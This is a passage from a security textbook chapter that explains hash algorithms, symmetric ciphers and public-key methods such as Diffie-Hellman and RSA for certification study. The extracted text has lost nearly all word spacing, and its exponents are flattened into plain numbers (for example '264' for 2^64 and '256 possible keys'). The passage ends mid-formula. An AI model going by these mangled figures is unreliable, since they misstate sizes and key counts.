Ahashalgorithmcanbecompromisedwithwhatiscalledacollisionattack,inwhichanattackerfindstwodifferentmessagesthathashtothesamevalue.Thistypeofattackisverydifficultandrequiresgeneratingaseparatealgorithmthatattemptstofindatextthatwillhashtothesamevalueofaknownhash.Thismustoccurfasterthansimplyeditingcharactersuntilyouhashtothesamevalue,whichisabrute-forcetypeattack.Theconsequenceofahashfunctionthatsuffersfromcollisionsisalossofintegrity.Ifanattackercanmaketwodifferentinputspurposefullyhashtothesamevalue,shemighttrickpeopleintorunningmaliciouscodeandcauseotherproblems.PopularhashalgorithmsaretheSecureHashAlgorithm(SHA)series,theRIPEMDalgorithms,andtheMessageDigest(MD)hashofvaryingversions(MD2,MD4,MD5).Becauseofweaknesses,andcollisionattackvulnerabilities,manyhashfunctionsarenowconsideredtobeinsecure,includingMD2,MD4,MD5,andSHA-1series.
TechTip
HashingAlgorithmsThehashingalgorithmsincommonuseareMD2,MD4,andMD5,andSHA-1,SHA-256,SHA-384,andSHA-512.Becauseofpotentialcollisions,MD2,MD4,MD5,andSHA-1havebeendeprecatedbymanygroups.Althoughnotconsideredsecure,theyarestillfoundinuse,atestamenttoslowadoptionofbettersecurity.
Hashingfunctionsareverycommonandplayanimportantroleinthewayinformation,suchaspasswords,isstoredsecurely,andthewayinwhichmessagescanbesigned.Bycomputingadigestofthemessage,lessdataneedstobesignedbythemorecomplexasymmetricencryption,andthisstillmaintainsassurancesaboutmessageintegrity.Thisistheprimarypurposeforwhichtheprotocolsweredesigned,andtheirsuccesswill
allowgreatertrustinelectronicprotocolsanddigitalsignatures.
SHASecureHashAlgorithm(SHA)referstoasetofhashalgorithmsdesignedandpublishedbytheNationalInstituteofStandardsandTechnology(NIST)andtheNationalSecurityAgency(NSA).ThesealgorithmsareincludedintheSHAstandardFederalInformationProcessingStandards(FIPS)180-2and180-3.TheindividualstandardsarenamedSHA-1,SHA-224,SHA-256,SHA-384,andSHA-512.ThelatterthreevariantsareoccasionallyreferredtocollectivelyasSHA-2.ThenewestversionisknownasSHA-3,whichisspecifiedinFIPS202.
SHA-1SHA-1,developedin1993,wasdesignedasthealgorithmtobeusedforsecurehashingintheU.S.DigitalSignatureStandard(DSS).ItismodeledontheMD4algorithmandimplementsfixesinthatalgorithmdiscoveredbytheNSA.Itcreatesmessagedigests160bitslongthatcanbeusedbytheDigitalSignatureAlgorithm(DSA),whichcanthencomputethesignatureofthemessage.Thisiscomputationallysimpler,asthemessagedigestistypicallymuchsmallerthantheactualmessage—smallermessage,lesswork.
TechTip
BlockModeinHashingMosthashalgorithmsuseblockmodetoprocess;thatis,theyprocessallinputinsetblocksofdatasuchas512-bitblocks.Thefinalhashistypicallygeneratedbyaddingtheoutputblockstogethertoformthefinaloutputstringof160or512bits.
SHA-1works,asdoallhashingfunctions,byapplyingacompressionfunctiontothedatainput.Itacceptsaninputofupto264bitsorlessand
thencompressesdowntoahashof160bits.SHA-1worksinblockmode,separatingthedataintowordsfirst,andthengroupingthewordsintoblocks.Thewordsare32-bitstringsconvertedtohex;groupedtogetheras16words,theymakeupa512-bitblock.IfthedatathatisinputtoSHA-1isnotamultipleof512,themessageispaddedwithzerosandanintegerdescribingtheoriginallengthofthemessage.Oncethemessagehasbeenformattedforprocessing,theactualhashcanbegenerated.The512-bitblocksaretakeninorderuntiltheentiremessagehasbeenprocessed.
Trytokeepattacksoncrypto-systemsinperspective.Whilethetheoryofattackinghashingthroughcollisionsissolid,findingacollisionstilltakesenormousamountsofeffort.InthecaseofattackingSHA-1,thecollisionisabletobefoundfasterthanapurebrute-forcemethod,butbymostestimateswillstilltakeseveralyears.
Atonetime,SHA-1wasoneofthemoresecurehashfunctions,butithasbeenfoundtobevulnerabletoacollisionattack.Thisattackfoundacollisionin269computations,lessthanthebrute-forcemethodof280computations.Whilethisisnotatremendouslypracticalattack,itdoessuggestaweakness.Thus,manysecurityprofessionalsaresuggestingthatimplementationsofSHA-1bemovedtooneoftheotherSHAversions.Theselongerversions,SHA-256,SHA-384,andSHA-512,allhavelongerhashresults,makingthemmoredifficulttoattacksuccessfully.TheaddedsecurityandresistancetoattackinSHA-2doesrequiremoreprocessingpowertocomputethehash.
SHA-2SHA-2isacollectivenameforSHA-224,SHA-256,SHA-384,andSHA-512.SHA-256issimilartoSHA-1inthatitalsoacceptsinputoflessthan264bitsandreducesthatinputtoahash.Thisalgorithmreducesto256bitsinsteadofSHA-1’s160.DefinedinFIPS180-2in2002,SHA-256islistedasanupdatetotheoriginalFIPS180thatdefinedSHA.SimilartoSHA-1,
SHA-256uses32-bitwordsand512-bitblocks.Paddingisaddeduntiltheentiremessageisamultipleof512.SHA-256usessixty-four32-bitwords,eightworkingvariables,andresultsinahashvalueofeight32-bitwords,hence256bits.SHA-224isatruncatedversionoftheSHA-256algorithmthatresultsina224-bithashvalue.TherearenoknowncollisionattacksagainstSHA-256;however,anattackonreduced-roundSHA-256ispossible.SHA-512isalsosimilartoSHA-1,butithandleslargersetsofdata.
SHA-512accepts2128bitsofinput,whichitpadsuntilithasseveralblocksofdatain1024-bitblocks.SHA-512alsouses64-bitwordsinsteadofSHA-1’s32-bitwords.Ituseseight64-bitwordstoproducethe512-bithashvalue.SHA-384isatruncatedversionofSHA-512thatusessix64-bitwordstoproducea384-bithash.WhileSHA-2isnotascommonasSHA-1,moreapplicationsare
startingtoutilizeitafterSHA-1wasshowntobepotentiallyvulnerabletoacollisionattack.
SHA-3SHA-3isthenamefortheSHA-2replacement.In2012,theKeccakhashfunctionwontheNISTcompetitionandwaschosenasthebasisfortheSHA-3method.BecausethealgorithmiscompletelydifferentfromthepreviousSHAseries,ithasprovedtobemoreresistanttoattacksthataresuccessfulagainstthem.AstheSHA-3seriesisrelativelynew,ithasnotbeenwidelyadoptedinmanyciphersuitesyet.
TheSHA-2andSHA-3seriesarecurrentlyapprovedforuse.SHA-1hasbeendeprecatedanditsusediscontinuedinmanystrongciphersuites.
RIPEMD
RACEIntegrityPrimitivesEvaluationMessageDigest(RIPEMD)isahashingfunctiondevelopedbytheRACEIntegrityPrimitivesEvaluation(RIPE)consortium.Itoriginallyprovideda128-bithashandwaslatershowntohaveproblemswithcollisions.RIPEMDwasstrengthenedtoa160-bithashknownasRIPEMD-160byHansDobbertin,AntoonBosselaers,andBartPreneel.Therearealso256-and320-bitversionsofthealgorithmknownasRIPEMD-256andRIPEMD-320.
RIPEMD-160RIPEMD-160isanalgorithmbasedonMD4,butitusestwoparallelchannelswithfiverounds.Theoutputconsistsoffive32-bitwordstomakea160-bithash.TherearealsolargeroutputextensionsoftheRIPEMD-160algorithm.Theseextensions,RIPEMD-256andRIPEMD-320,offeroutputsof256bitsand320bits,respectively.Whiletheseofferlargeroutputsizes,thisdoesnotmakethehashfunctioninherentlystronger.
MessageDigestMessageDigest(MD)isthegenericversionofoneofseveralalgorithmsthataredesignedtocreateamessagedigestorhashfromdatainputintothealgorithm.MDalgorithmsworkinthesamemannerasSHAinthattheyuseasecuremethodtocompressthefileandgenerateacomputedoutputofaspecifiednumberofbits.TheMDalgorithmswerealldevelopedbyRonaldL.RivestofMIT.
MD2MD2wasdevelopedin1989andisinsomewaysanearlyversionofthelaterMD5algorithm.Ittakesadatainputofanylengthandproducesahashoutputof128bits.ItisdifferentfromMD4andMD5inthatMD2isoptimizedfor8-bitmachines,whereastheothertwoareoptimizedfor32-bitmachines.Afterthefunctionhasbeenrunforevery16bytesofthe
message,theoutputresultisa128-bitdigest.TheonlyknownattackthatissuccessfulagainstMD2requiresthatthechecksumnotbeappendedtothemessagebeforethehashfunctionisrun.Withoutachecksum,thealgorithmcanbevulnerabletoacollisionattack.Somecollisionattacksarebaseduponthealgorithm’sinitializationvector(IV).
MD4MD4wasdevelopedin1990andisoptimizedfor32-bitcomputers.Itisafastalgorithm,butitissubjecttomoreattacksthanmoresecurealgorithmssuchasMD5.AnextendedversionofMD4computesthemessageinparallelandproducestwo128-bitoutputs—effectivelya256-bithash.Eventhoughalongerhashisproduced,securityhasnotbeenimprovedbecauseofbasicflawsinthealgorithm.Acryptographer,HansDobbertin,hasshownhowcollisionsinMD4canbefoundinunderaminuteusingjustaPC.Thisvulnerabilitytocollisionsappliesto128-bitMD4aswellas256-bitMD4.Becauseofweaknesses,peoplehavemovedawayfromMD4tomorerobusthashfunctions.
MD5MD5wasdevelopedin1991andisstructuredafterMD4butwithadditionalsecuritytoovercometheproblemsinMD4.Therefore,itisverysimilartotheMD4algorithm,onlyslightlyslowerandmoresecure.
MD5createsa128-bithashofamessageofanylength.
Recently,successfulattacksonthealgorithmhaveoccurred.Cryptanalysishasdisplayedweaknessesinthecompressionfunction.However,thisweaknessdoesnotlenditselftoanattackonMD5itself.CzechcryptographerVlastimilKlímapublishedworkshowingthatMD5collisionscanbecomputedinabouteighthoursonastandardhomePC.In
November2007,researcherspublishedresultsshowingtheabilitytohavetwoentirelydifferentWin32executableswithdifferentfunctionalitybutthesameMD5hash.Thisdiscoveryhasobviousimplicationsforthedevelopmentofmalware.ThecombinationoftheseproblemswithMD5haspushedpeopletoadoptastrongSHAversionforsecurityreasons.
TechTip
RainbowTablesRainbowtablesareprecomputedhashtablesthatenablelookingupsmalltextentriesviatheirhashvalues.Thismakeshashedpasswords“reversible”bylookingupthehashinaprecomputedhashtable.Thisworksforsmallpasswords(lessthan10characters)andisveryfast.Saltingpasswordsisoneofthedefensesagainstthesetables.
HashingSummaryHashingfunctionsareverycommon,andtheyplayanimportantroleinthewayinformation,suchaspasswords,isstoredsecurelyandthewayinwhichmessagescanbesigned.Bycomputingadigestofthemessage,lessdataneedstobesignedbythemorecomplexasymmetricencryption,andthisstillmaintainsassurancesaboutmessageintegrity.Thisistheprimarypurposeforwhichtheprotocolsweredesigned,andtheirsuccesswillallowgreatertrustinelectronicprotocolsanddigitalsignatures.ThefollowingillustrationshowsanMD5hashcalculationinLinux.
SymmetricEncryptionSymmetricencryptionistheolderandsimplermethodofencryptinginformation.Thebasisofsymmetricencryptionisthatboththesenderandthereceiverofthemessagehavepreviouslyobtainedthesamekey.Thisis,infact,thebasisforeventheoldestciphers—theSpartansneededtheexactsamesizecylinder,makingthecylinderthe“key”tothemessage,andinshiftciphersbothpartiesneedtoknowthedirectionandamountofshiftbeingperformed.Allsymmetricalgorithmsarebaseduponthissharedsecretprinciple,includingtheunbreakableone-timepadmethod.Figure5.6isasimplediagramshowingtheprocessthatasymmetric
algorithmgoesthroughtoprovideencryptionfromplaintexttociphertext.Thisciphertextmessageis,presumably,transmittedtothemessagerecipient,whogoesthroughtheprocesstodecryptthemessageusingthesamekeythatwasusedtoencryptthemessage.Figure5.6showsthekeystothealgorithm,whicharethesamevalueinthecaseofsymmetricencryption.
•Figure5.6Layoutofasymmetricalgorithm
Unlikewithhashfunctions,acryptographickeyisinvolvedinsymmetricencryption,sotheremustbeamechanismforkeymanagement(discussedearlierinthechapter).Managingthecryptographickeysiscriticallyimportantinsymmetricalgorithmsbecausethekeyunlocksthedatathatisbeingprotected.However,thekeyalsoneedstobeknownby,ortransmittedtoinaconfidentialway,thepartytowhichyouwishtocommunicate.Akeymustbemanagedatallstages,whichrequiressecuringitonthelocalcomputer,securingitontheremoteone,protectingitfromdatacorruption,protectingitfromloss,and,probablythemostimportantstep,protectingitwhileitistransmittedbetweenthetwoparties.Laterinthechapterwewilllookatpublickeycryptography,whichgreatlyeasesthekeymanagementissue,butforsymmetricalgorithmsthemostimportantlessonistostoreandsendthekeyonlybyknownsecuremeans.Someofthemorepopularsymmetricencryptionalgorithmsinusetoday
areDES,3DES,AES,andIDEA.
DESDES,theDataEncryptionStandard,wasdevelopedinresponsetotheNationalBureauofStandards(NBS),nowknownastheNationalInstituteofStandardsandTechnology(NIST),issuingarequestforproposalsforastandardcryptographicalgorithmin1973.NBSreceivedapromising
responseinanalgorithmcalledLucifer,originallydevelopedbyIBM.TheNBSandtheNSAworkedtogethertoanalyzethealgorithm’ssecurity,andeventuallyDESwasadoptedasafederalstandardin1976.DESiswhatisknownasablockcipher;itsegmentstheinputdatainto
blocksofaspecifiedsize,typicallypaddingthelastblocktomakeitamultipleoftheblocksizerequired.Thisisincontrasttoastreamcipher,whichencryptsthedatabitbybit.InthecaseofDES,theblocksizeis64bits,whichmeansDEStakesa64-bitinputandoutputs64bitsofciphertext.Thisprocessisrepeatedforall64-bitblocksinthemessage.DESusesakeylengthof56bits,andallsecurityrestswithinthekey.Thesamealgorithmandkeyareusedforbothencryptionanddecryption.Atthemostbasiclevel,DESperformsasubstitutionandthena
permutation(aformoftransposition)ontheinput,baseduponthekey.Thisactioniscalledaround,andDESperformsthis16timesonevery64-bitblock.Thealgorithmgoesstepbystep,producing64-bitblocksofciphertextforeachplaintextblock.ThisiscarriedonuntiltheentiremessagehasbeenencryptedwithDES.Asmentioned,thesamealgorithmandkeyareusedtodecryptandencryptwithDES.Theonlydifferenceisthatthesequenceofkeypermutationsisusedinreverseorder.OvertheyearsthatDEShasbeenacryptographicstandard,alotof
cryptanalysishasoccurred,andwhilethealgorithmhasheldupverywell,someproblemshavebeenencountered.Weakkeysarekeysthatarelesssecurethanthemajorityofkeysallowedinthekeyspaceofthealgorithm.InthecaseofDES,becauseofthewaytheinitialkeyismodifiedtogetthesubkey,certainkeysareweakkeys.Theweakkeysequateinbinarytohavingall1’sorall0’s,likethoseshowninFigure5.7,ortohavinghalfthekeyall1’sandtheotherhalfall0’s.
•Figure5.7WeakDESkeys
Semiweakkeys,withwhichtwokeyswillencryptplaintexttoidenticalciphertext,alsoexist,meaningthateitherkeywilldecrypttheciphertext.Thetotalnumberofpossiblyweakkeysis64,whichisverysmallrelativetothe256possiblekeysinDES.With16roundsandnotusingaweakkey,DESisreasonablysecure
and,amazingly,hasbeenformorethantwodecades.In1999,adistributedeffortconsistingofasupercomputerand100,000PCsovertheInternetwasmadetobreaka56-bitDESkey.Byattemptingmorethan240billionkeyspersecond,theeffortwasabletoretrievethekeyinlessthanaday.Thisdemonstratesanincredibleresistancetocrackinga20-year-oldalgorithm,butitalsodemonstratesthatmorestringentalgorithmsareneededtoprotectdatatoday.
3DESTripleDES(3DES)isavariantofDES.Dependingonthespecificvariant,ituseseithertwoorthreekeysinsteadofthesinglekeythatDESuses.ItalsospinsthroughtheDESalgorithmthreetimesviawhat’scalledmultipleencryption.Multipleencryptioncanbeperformedinseveraldifferentways.The
simplestmethodofmultipleencryptionisjusttostackalgorithmsontopofeachother—takingplaintext,encryptingitwithDES,thenencryptingthefirstciphertextwithadifferentkey,andthenencryptingthesecondciphertextwithathirdkey.Inreality,thistechniqueislesseffectivethanthetechniquethat3DESuses.Oneofthemodesof3DES(EDEmode)istoencryptwithonekey,thendecryptwithasecond,andthenencryptwithathird,asshowninFigure5.8.
•Figure5.8Diagramof3DES
Thisgreatlyincreasesthenumberofattemptsneededtoretrievethekeyandisasignificantenhancementofsecurity.Theadditionalsecuritycomesataprice,however.Itcantakeuptothreetimeslongertocompute3DESthantocomputeDES.However,theadvancesinmemoryandprocessing
powerintoday’selectronicsshouldmakethisproblemirrelevantinalldevicesexceptforverysmalllow-powerhandhelds.Theonlyweaknessesof3DESarethosethatalreadyexistinDES.
However,duetotheuseofdifferentkeysinthesamealgorithm,effectingalongerkeylengthbyaddingthefirstkeyspacetothesecondkeyspace,andthegreaterresistancetobrute-forcing,3DEShaslessactualweakness.While3DEScontinuestobepopularandisstillwidelysupported,AEShastakenoverasthesymmetricencryptionstandard.
AESThecurrentgoldstandardforsymmetricencryptionistheAESalgorithm.Developedinresponsetoaworldwidecallinthelate1990sforanewsymmetriccipher,agroupofDutchresearcherssubmittedamethodcalledRijndael(pronounced“raindoll”).Inthefallof2000,NISTpickedRijndaeltobethenewAES.Itwas
chosenforitsoverallsecurityaswellasitsgoodperformanceonlimited-capacitydevices.Rijndael’sdesignwasinfluencedbySquare,alsowrittenbyJoanDaemenandVincentRijmen.LikeSquare,Rijndaelisablockcipherthatseparatesdatainputinto128-bitblocks.Rijndaelcanalsobeconfiguredtouseblocksof192or256bits,butAEShasstandardizedon128-bitblocks.AEScanhavekeysizesof128,192,and256bits,withthesizeofthekeyaffectingthenumberofroundsusedinthealgorithm.LongerkeyversionsareknownasAES-192andAES-256,respectively.
TechTip
AESinDepthForamorein-depthdescriptionofAES,seetheNISTdocumenthttp://csrc.nist.gov/publications/fips/fips197/fips-197.pdf.
TheRijndael/AESalgorithmiswellthoughtoutandhasasuitablekey
lengthtoprovidesecurityformanyyearstocome.WhilenoefficientattackscurrentlyexistagainstAES,moretimeandanalysiswilltellifthisstandardcanlastaslongasDEShas.
CASTCASTisanencryptionalgorithmthatissimilartoDESinitsstructure.ItwasdesignedbyCarlisleAdamsandStaffordTavares.CASTusesa64-bitblocksizefor64-and128-bitkeyversions,anda128-bitblocksizeforthe256-bitkeyversion.LikeDES,itdividestheplaintextblockintoalefthalfandarighthalf.TherighthalfisthenputthroughfunctionfandthenisXORedwiththelefthalf.Thisvaluebecomesthenewrighthalf,andtheoriginalrighthalfbecomesthenewlefthalf.Thisisrepeatedforeightroundsfora64-bitkey,andtheleftandrightoutputisconcatenatedtoformtheciphertextblock.ThealgorithminCAST-256formwassubmittedfortheAESstandardbutwasnotchosen.CASThasundergonethoroughanalysis,withonlyminorweaknessesdiscoveredthataredependentonlownumbersofrounds.Currently,nobetterwayisknowntobreakhigh-roundCASTthanbybrute-forcingthekey,meaningthatwithsufficientkeylength,CASTshouldbeplacedwithothertrustedalgorithms.
RCRCisageneraltermforseveralciphersalldesignedbyRonRivest—RCofficiallystandsforRivestCipher.RC1,RC2,RC3,RC4,RC5,andRC6areallciphersintheseries.RC1andRC3nevermadeittorelease,butRC2,RC4,RC5,andRC6areallworkingalgorithms.
RC2RC2wasdesignedasaDESreplacement,anditisavariable-key-sizeblock-modecipher.Thekeysizecanbefrom8bitsto1024bits,withtheblocksizebeingfixedat64bits.RC2breaksuptheinputblocksintofour
16-bitwordsandthenputsthemthrough18roundsofeithermixormashoperations,outputting64bitsofciphertextfor64bitsofplaintext.AccordingtoRSA,RC2isuptothreetimesfasterthanDES.RSA
maintainedRC2asatradesecretforalongtime,withthesourcecodeeventuallybeingillegallypostedontheInternet.TheabilityofRC2toacceptdifferentkeylengthsisoneofthelargervulnerabilitiesinthealgorithm.Anykeylengthbelow64bitscanbeeasilyretrievedbymoderncomputationalpower.Additionally,thereisarelatedkeyattackthatneeds234chosenplaintextstowork.Consideringtheseweaknesses,RC2isnotrecommendedasastrongcipher.
RC5RC5isablockcipher,writtenin1994.Ithasmultiplevariableelements,numbersofrounds,keysizes,andblocksizes.Thisalgorithmisrelativelynew,butifconfiguredtorunenoughrounds,RC5seemstoprovideadequatesecurityforcurrentbrute-forcingtechnology.Rivestrecommendsusingatleast12rounds.With12roundsinthealgorithm,cryptanalysisinalinearfashionproveslesseffectivethanbrute-forceagainstRC5,anddifferentialanalysisfailsfor15ormorerounds.AneweralgorithmisRC6.
RC6RC6isbasedonthedesignofRC5.Itusesa128-bitblocksize,separatedintofourwordsof32bitseach.Itusesaroundcountof20toprovidesecurity,andithasthreepossiblekeysizes:128,192,and256bits.RC6isamodernalgorithmthatrunswellon32-bitcomputers.Withasufficientnumberofrounds,thealgorithmmakesbothlinearanddifferentialcryptanalysisinfeasible.Theavailablekeylengthsmakebrute-forceattacksextremelytime-consuming.RC6shouldprovideadequatesecurityforsometimetocome.
RC4
RC4wascreatedbeforeRC5andRC6,butitdiffersinoperation.RC4isastreamcipher,whereasallthesymmetriccipherswehavelookedatsofarhavebeenblockciphers.Astreamcipherworksbyencipheringtheplaintextinastream,usuallybitbybit.Thismakesstreamciphersfasterthanblock-modeciphers.StreamciphersaccomplishthisbyperformingabitwiseXORwiththeplaintextstreamandageneratedkeystream.RC4operatesinthismanner.Itwasdevelopedin1987andremaineda
tradesecretofRSAuntilitwaspostedtotheInternetin1994.RC4canuseakeylengthof8to2048bits,thoughthemostcommonversionsuse128-bitkeysor,ifsubjecttotheoldexportrestrictions,40-bitkeys.Thekeyisusedtoinitializea256-bytestatetable.Thistableisusedtogeneratethepseudo-randomstreamthatisXORedwiththeplaintexttogeneratetheciphertext.Alternatively,thestreamisXORedwiththeciphertexttoproducetheplaintext.Thealgorithmisfast,sometimestentimesfasterthanDES.Themost
vulnerablepointoftheencryptionisthepossibilityofweakkeys.Onekeyin256cangeneratebytescloselycorrelatedwithkeybytes.ProperimplementationsofRC4needtoincludeweakkeydetection.
RC4isthemostwidelyusedstreamcipherandisusedinpopularprotocolssuchasTransportLayerSecurity(TLS)andWEP/WPA/WPA2.
BlowfishBlowfishwasdesignedin1994byBruceSchneier.Itisablock-modecipherusing64-bitblocksandavariablekeylengthfrom32to448bits.Itwasdesignedtorunquicklyon32-bitmicroprocessorsandisoptimizedforsituationswithfewkeychanges.Encryptionisdonebyseparatingthe64-bitinputblockintotwo32-bitwords,andthenafunctionisexecutedeveryround.Blowfishhas16rounds;oncetheroundsarecompleted,the
twowordsarethenrecombinedtoformthe64-bitoutputciphertext.TheonlysuccessfulcryptanalysistodateagainstBlowfishhasbeenagainstvariantsthatusedareducednumberofrounds.Theredoesnotseemtobeaweaknessinthefull16-roundversion.
TwofishTwofishwasdevelopedbyBruceSchneier,DavidWagner,ChrisHall,NielsFerguson,JohnKelsey,andDougWhiting.TwofishwasoneofthefivefinalistsfortheAEScompetition.LikeotherAESentrants,itisablockcipher,utilizing128-bitblockswithavariable-lengthkeyofupto256bits.Ituses16roundsandsplitsthekeymaterialintotwosets,onetoperformtheactualencryptionandtheothertoloadintothealgorithm’sS-boxes.Thisalgorithmisavailableforpublicuseandhasproventobesecure.
TechTip
S-BoxesS-boxes,orsubstitutionboxes,areamethodusedtoprovideconfusion,aseparationoftherelationshipbetweenthekeybitsandtheciphertextbits.Usedinmostsymmetricschemes,theyperformaformofsubstitutionandcanprovidesignificantstrengtheningofanalgorithmagainstcertainformsofattack.Theycanbeintheformoflookuptables,eitherstaticlikeDES,ordynamic(basedonthekey)inotherformssuchasTwofish.
IDEAIDEA(InternationalDataEncryptionAlgorithm)startedoutasPES,orProposedEncryptionCipher,in1990,anditwasmodifiedtoimproveitsresistancetodifferentialcryptanalysisanditsnamewaschangedtoIDEAin1992.Itisablock-modecipherusinga64-bitblocksizeanda128-bitkey.Theinputplaintextissplitintofour16-bitsegments,A,B,C,andD.
Theprocessuseseightrounds,withafinalfour-stepprocess.Theoutputofthelastfourstepsisthenconcatenatedtoformtheciphertext.Allcurrentcryptanalysisonfull,eight-roundIDEAshowsthatthemost
efficientattackwouldbetobrute-forcethekey.The128-bitkeywouldpreventthisattackbeingaccomplished,givencurrentcomputertechnology.TheonlyknownissueisthatIDEAissusceptibletoaweakkey—likeakeythatismadeofall0’s.Thisweakkeyconditioniseasytocheckfor,andtheweaknessissimpletomitigate.
Blockvs.StreamWhenencryptionoperationsareperformedondata,therearetwoprimarymodesofoperation,blockandstream.Blockoperationsareperformedonblocksofdata,enablingbothtranspositionandsubstitutionoperations.Thisispossiblewhenlargepiecesofdataarepresentfortheoperations.StreamdatahasbecomemorecommonwithaudioandvideoacrosstheWeb.Theprimarycharacteristicofstreamdataisthatitisnotavailableinlargechunks,buteitherbitbybitorbytebybyte,piecestoosmallforblockoperations.Streamciphersoperateusingsubstitutiononlyandthereforeofferlessrobustprotectionthanblockciphers.Table5.1comparesandcontrastsblockandstreamciphers.
Table5.1 ComparisonofBlockandStreamCiphers
SymmetricEncryptionSummarySymmetricalgorithmsareimportantbecausetheyarecomparativelyfastandhavefewcomputationalrequirements.Theirmainweaknessisthattwogeographicallydistantpartiesbothneedtohaveakeythatmatchestheotherkeyexactly(seeFigure5.9).
•Figure5.9Symmetrickeysmustmatchexactlytoencryptanddecryptthemessage.
AsymmetricEncryptionAsymmetricencryptionismorecommonlyknownaspublickeycryptography.Asymmetricencryptionisinmanywayscompletelydifferentfromsymmetricencryption.Whilebothareusedtokeepdatafrombeingseenbyunauthorizedusers,asymmetriccryptographyusestwokeysinsteadofone.ItwasinventedbyWhitfieldDiffieandMartinHellmanin1975.Thesystemusesapairofkeys:aprivatekeythatiskeptsecretandapublickeythatcanbesenttoanyone.Thesystem’ssecurityreliesuponresistancetodeducingonekey,giventheother,andthusretrievingtheplaintextfromtheciphertext.Asymmetricencryptioncreatesthepossibilityofdigitalsignaturesand
alsoaddressesthemainweaknessofsymmetriccryptography.Theabilitytosendmessagessecurelywithoutsendersandreceivershavinghadpriorcontacthasbecomeoneofthebasicconcernswithsecurecommunication.Digitalsignatureswillenablefasterandmoreefficientexchangeofallkindsofdocuments,includinglegaldocuments.Withstrongalgorithmsandgoodkeylengths,securitycanbeassured.Asymmetricencryptioninvolvestwoseparatebutmathematically
relatedkeys.Thekeysareusedinanopposingfashion.Onekeyundoestheactionsoftheotherandviceversa.So,asshowninFigure5.10,ifyouencryptamessagewithonekey,theotherkeyisusedtodecryptthemessage.Inthetopexample,AlicewishestosendaprivatemessagetoBob,sosheusesBob’spublickeytoencryptthemessage.Then,sinceonlyBob’sprivatekeycandecryptthemessage,onlyBobcanreadit.Inthelowerexample,Bobwishestosendamessage,withproofthatitisfromhim.Byencryptingitwithhisprivatekey,anyonewhodecryptsitwithhispublickeyknowsthemessagecamefromBob.
•Figure5.10Usinganasymmetricalgorithm
Publickeycryptographyalwaysinvolvestwokeys,apublickeyandaprivatekey,whichtogetherareknownasakeypair.Thepublickeyismadewidelyavailabletoanyonewhomayneedit,whiletheprivatekeyiscloselysafeguardedandsharedwithnoone.
Asymmetrickeysaredistributedusingcertificates.Adigitalcertificatecontainsinformationabouttheassociationofthepublickeytoanentity,andadditionalinformationthatcanbeusedtoverifythecurrentvalidityofthecertificateandthekey.Whenkeysareexchangedbetweenmachines,suchasduringanSSL/TLShandshake,theexchangeisdonebypassingcertificates.
Asymmetricmethodsaresignificantlyslowerthansymmetricmethodsandthusaretypicallynotsuitableforbulkencryption.
Publickeysystemstypicallyworkbyusinghardmathproblems.Oneofthemorecommonmethodsreliesonthedifficultyoffactoringlargenumbers.Thesefunctionsareoftencalledtrapdoorfunctions,astheyaredifficulttoprocesswithoutthekeybuteasytoprocesswhenyouhavethekey—thetrapdoorthroughthefunction.Forexample,givenaprimenumber,say293,andanotherprime,suchas307,itisaneasyfunctiontomultiplythemtogethertoget89,951.Given89,951,itisnotsimpletofindthefactors293and307unlessyouknowoneofthemalready.Computerscaneasilymultiplyverylargeprimeswithhundredsorthousandsofdigitsbutcannoteasilyfactortheproduct.Thestrengthofthesefunctionsisveryimportant:Becauseanattackeris
likelytohaveaccesstothepublickey,hecanruntestsofknownplaintextandproduceciphertext.Thisallowsinstantcheckingofguessesthataremadeaboutthekeysofthealgorithm.Publickeysystems,becauseoftheirdesign,alsoformthebasisfordigitalsignatures,acryptographicmethodforsecurelyidentifyingpeople.RSA,Diffie-Hellman,ellipticcurvecryptography(ECC),andElGamalareallpopularasymmetricprotocols.Wewilllookatallofthemandtheirsuitabilityfordifferentfunctions.
CrossCheckDigitalCertificatesInChapter6youwilllearnmoreaboutdigitalcertificatesandhowencryptionisimportanttoapublickeyinfrastructure.Whyisanasymmetricalgorithmsoimportanttodigitalsignatures?
Diffie-Hellman
Diffie-Hellman(DH)wascreatedin1976byWhitfieldDiffieandMartinHellman.Thisprotocolisoneofthemostcommonencryptionprotocolsinusetoday.ItplaysaroleintheelectronickeyexchangemethodoftheSecureSocketsLayer(SSL)protocol.ItisalsousedbytheTransportLayerSecurity(TLS),SecureShell(SSH),andIPSecurity(IPsec)protocols.Diffie-Hellmanisimportantbecauseitenablesthesharingofasecretkeybetweentwopeoplewhohavenotcontactedeachotherbefore.Theprotocol,likeRSA,useslargeprimenumberstowork.Twousers
agreetotwonumbers,PandG,withPbeingasufficientlylargeprimenumberandGbeingthegenerator.Bothuserspickasecretnumber,aandb.Thenbothuserscomputetheirpublicnumber:
User1X=GamodP,withXbeingthepublicnumberUser2Y=GbmodP,withYbeingthepublicnumber
Theusersthenexchangepublicnumbers.User1knowsP,G,a,X,andY.
User1ComputesKa=YamodPUser2ComputesKb=XbmodP
WithKa=Kb=K,nowbothusersknowthenewsharedsecretK.Thisisthebasicalgorithm,andalthoughmethodshavebeencreatedto
strengthenit,Diffie-Hellmanisstillinwideuse.Itremainsveryeffectivebecauseofthenatureofwhatitisprotecting—atemporary,automaticallygeneratedsecretkeythatisgoodonlyforasinglecommunicationsession.VariationsofDiffie-HellmanincludeEphemeralDiffie-Hellman(EDH),
EllipticCurveDiffie-Hellman(ECDH),andEllipticCurveDiffie-HellmanEphemeral(ECDHE).Thesearediscussedindetaillaterinthechapter.
Diffie-Hellmanisthegoldstandardforkeyexchange,andfortheCompTIASecurity+exam,youshouldunderstandthesubtledifferencesbetweenthedifferentforms,DH,EDH,ECDH,andECDHE.
RSARSAisoneofthefirstpublickeycryptosystemseverinvented.Itcanbeusedforbothencryptionanddigitalsignatures.RSAisnamedafteritsinventors,RonRivest,AdiShamir,andLeonardAdleman,andwasfirstpublishedin1977.Thisalgorithmusestheproductoftwoverylargeprimenumbersand
worksontheprincipleofdifficultyinfactoringsuchlargenumbers.It’sbesttochooselargeprimenumbersthatarefrom100to200digitsinlengthandareequalinlength.ThesetwoprimeswillbePandQ.Randomlychooseanencryptionkey,E,sothatEisgreaterthan1,EislessthanP*Q,andEmustbeodd.Emustalsoberelativelyprimeto(P–1)and(Q–1).ThencomputethedecryptionkeyD:
D=E–1mod((P–1)(Q–1))Nowthattheencryptionkeyanddecryptionkeyhavebeengenerated,
thetwoprimenumberscanbediscarded,buttheyshouldnotberevealed.Toencryptamessage,itshouldbedividedintoblockslessthanthe
productofPandQ.Then,
Ci=MiEmod(P*Q)
